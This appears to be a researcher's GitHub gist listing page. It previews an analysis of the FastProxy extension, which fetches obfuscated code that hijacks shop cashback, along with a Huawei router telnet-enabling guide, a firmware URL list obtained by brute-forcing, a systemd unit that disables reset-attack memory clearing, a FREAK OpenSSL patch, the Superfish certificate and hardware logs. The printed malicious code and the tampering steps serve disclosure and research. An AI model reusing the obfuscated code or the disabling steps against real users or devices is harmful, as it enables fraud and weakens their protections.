Skip to content

Instantly share code, notes, and snippets.

ValdikSS ValdikSS

Block or report user

Report or block ValdikSS

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View gist:1f1c71d6eead35a33a57099c26923bee
Браузерное расширение FastProxy загружает с сервера вредоносный код,
перенаправляющий cashback от различных интернет-магазинов автору расширения.
Обфусцированный код:
$guNnnrhIFAMI27BsMFv=function(a){return"string"==typeof $guNnnrhIFAMI27BsMFv.list[a]?$guNnnrhIFAMI27BsMFv.list[a].split("").reverse().join(""):$guNnnrhIFAMI27BsMFv.list[a]},$guNnnrhIFAMI27BsMFv.list=["of\xE6\xFBiht\xFBlru?lxp\xFBepyt\x04u\xDFv?di_txe?re\xECh?htgnel?rekram?\xB7\x04cna\xE6f?urdj\x04man?omorpi\xDF?g\xE6kc\xF4b?tnemucod?urdj\xAB\xD0l\xABapc\xFB\xECl?\xBFH\xC3?g\xE6r\xD1bus?ofnIegnahc?\xEB\x04doNtnerap?\x0FTtes?fOxednI\xD1al\x04saCrewoLot\x04tadpu?\xF4\xC8c\xAB\xC1\xDE\xABaz\x03\xAB\x0FTraelc?\x7Far\xD1ig","\xAEX\xAD*' [:_a\x1F{\xBCV(2\xCD\xF3T\xD4\x1F}\xC9)0005\xBC}\xA6V(\xD3\xDB\xCD\xA63(va\xBE\x06\x1F ;)1\xBCi(ec\x1CT\xA5's\x7Fpo-\xC0-x\xF2Va\xD6(\xE8T\xCAVa\xE7=>i ;1-U\xB5T=\x0E1a\xCAT\xD8\xA51\x17V C\xA5( P\xDD\xC9}\xA3\x1F}\xA6a\xB2Z\xA9Z\xC2Sa-8<Sa-8\xB0x\xB2pa\xA9pa\xC28-\xDE<8-\xDE\xB0d\xB24\xA94\xC2Ra-mh<Ra-mh\xB0
@ValdikSS
ValdikSS / disable-reset-attack-mitigation.service
Last active Aug 6, 2018
Disable Reset Attack Mitigation (Fedora 27)
View disable-reset-attack-mitigation.service
[Unit]
Description=Disable Reset Attack Mitigation
[Service]
Type=oneshot
ExecStart=/usr/bin/chattr -i /sys/firmware/efi/efivars/MemoryOverwriteRequestControl-e20939be-32d4-41be-a150-897f85d49829
ExecStop=/bin/bash -c 'echo -ne "\x07\x00\x00\x00\x00" > /sys/firmware/efi/efivars/MemoryOverwriteRequestControl-e20939be-32d4-41be-a150-897f85d49829'
RemainAfterExit=yes
[Install]
@ValdikSS
ValdikSS / huawei-e5885-backup.md
Last active Jun 16, 2019
How to backup current firmware on Huawei E5885
View huawei-e5885-backup.md

Huawei E5885 current firmware backup manual.

  1. Download modified usbloader, which will copy proper busybox into /system/busybox and enable telnetd on your device (will add additional line into /system/autorun.sh). Use it only on E5885, not on other device!
  2. Load it using balong-usbdload. Refer to this disassembling manual.
  3. After loading, wait about one minute, disconnect device from the computer and power off the device holding power button for ~15 seconds.
  4. Insert MicroSD card to the device and power it on.
  5. telnet 192.168.8.1 2323
/system/busybox sh
@ValdikSS
ValdikSS / huawei-fw-list.txt
Last active Jul 19, 2019
Huawei firmware files found on update server
View huawei-fw-list.txt
==========================================================================
DO NOT WRITE ANY QUESTIONS IN COMMENTS
==========================================================================
This is not appropriate place for discussions. Keep this list FW-only.
I do NOT have any firmware files apart from published here or on 4pda. Please do not contact me for firmware files requests.
This is a list of files found on Huawei update server by brute-forcing URL parameters.
Some firmware files have changelogs. Just change file name to "changelog.xml" in the end of the URL.
View gist:175f0f89d40b8689c0eb
% xrandr --newmode "3840x2160x49.98" 442.000000 3840 3888 3920 4000 2160 2163 2167 2211 +HSync -VSync
% xrandr --addmode DP1 "3840x2160x49.98"
% xrandr --output DP1 --mode "3840x2160x49.98"
View gist:5963db02241d0c0c6219
libva info: VA-API version 0.37.0
libva info: va_getDriverName() returns 0
libva info: Trying to open /usr/lib/dri/i965_drv_video.so
libva info: Found init function __vaDriverInit_0_37
libva info: va_openDriver() returns 0
vainfo: VA-API version: 0.37 (libva 1.5.1)
vainfo: Driver version: Intel i965 driver for Intel(R) Sandybridge Mobile - 1.5.1
vainfo: Supported profile and entrypoints
VAProfileMPEG2Simple : VAEntrypointVLD
VAProfileMPEG2Main : VAEntrypointVLD
View gist:3326bb37cc4f0e641950
Factory Details:
Rank primary (256)
Long-name VA-API H.264 encoder
Klass Codec/Encoder/Video
Description A VA-API based H.264 video encoder
Author Wind Yuan <feng.yuan@intel.com>
Plugin Details:
Name vaapi
Description VA-API based elements
@ValdikSS
ValdikSS / freak-rsa-keylife.md
Last active Aug 29, 2015
FREAK RSA 512 Keylife
View freak-rsa-keylife.md

Temporary RSA 512 Bit Keylife for FREAK attack

So I've patched OpenSSL's s_client a bit to print temporary RSA 512 public key used for EXPORT cipher

--- 1/apps/s_cb.c 2015-03-04 17:17:28.349494504 +0300
+++ 2/apps/s_cb.c 2015-03-04 17:17:30.452827799 +0300
@@ -507,6 +507,7 @@
     switch (EVP_PKEY_id(key)) {
     case EVP_PKEY_RSA:
View gist:beab7346f9c9592f6d33
-----BEGIN CERTIFICATE-----
MIIC9TCCAl6gAwIBAgIJANL8E4epRNznMA0GCSqGSIb3DQEBBQUAMFsxGDAWBgNV
BAoTD1N1cGVyZmlzaCwgSW5jLjELMAkGA1UEBxMCU0YxCzAJBgNVBAgTAkNBMQsw
CQYDVQQGEwJVUzEYMBYGA1UEAxMPU3VwZXJmaXNoLCBJbmMuMB4XDTE0MDUxMjE2
MjUyNloXDTM0MDUwNzE2MjUyNlowWzEYMBYGA1UEChMPU3VwZXJmaXNoLCBJbmMu
MQswCQYDVQQHEwJTRjELMAkGA1UECBMCQ0ExCzAJBgNVBAYTAlVTMRgwFgYDVQQD
Ew9TdXBlcmZpc2gsIEluYy4wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAOjz
Shh2Xxk/sc9Y6X9DBwmVgDXFD/5xMSeBmRImIKXfj2r8QlU57gk4idngNsSsAYJb
1Tnm+Y8HiN/+7vahFM6pdEXY/fAXVyqC4XouEpNarIrXFWPRt5tVgA9YvBxJ7SBi
3bZMpTrrHD2g/3pxptMQeDOuS8Ic/ZJKocPnQaQtAgMBAAGjgcAwgb0wDAYDVR0T
@ValdikSS
ValdikSS / donotasktoask_ru.md
Last active Feb 27, 2019
Спрашивайте сразу
View donotasktoask_ru.md

Вам отправили это сообщение по следующим возможным причинам:

  • Вы поприветствовались и ждете ответа
  • Вы спросили о том, можно ли задать вопрос, и ждете ответа
  • Вы скинули запрос авторизации и ждете ответа

Пожалуйста, не делайте так. Задавайте вопрос сразу, без прелюдий, без запросов авторизации (в том числе и в Jabber), и ждите ответа. Не повторяйте свой вопрос и не спрашивайте, на месте ли я.

Здесь комментарии не пишите, уведомление о них не приходит ни мне, ни вам.

Если вам интересно получить развернутый ответ и аргументы, почему не стоить здороваться и ожидать ответа при общении онлайн:

You can’t perform that action at this time.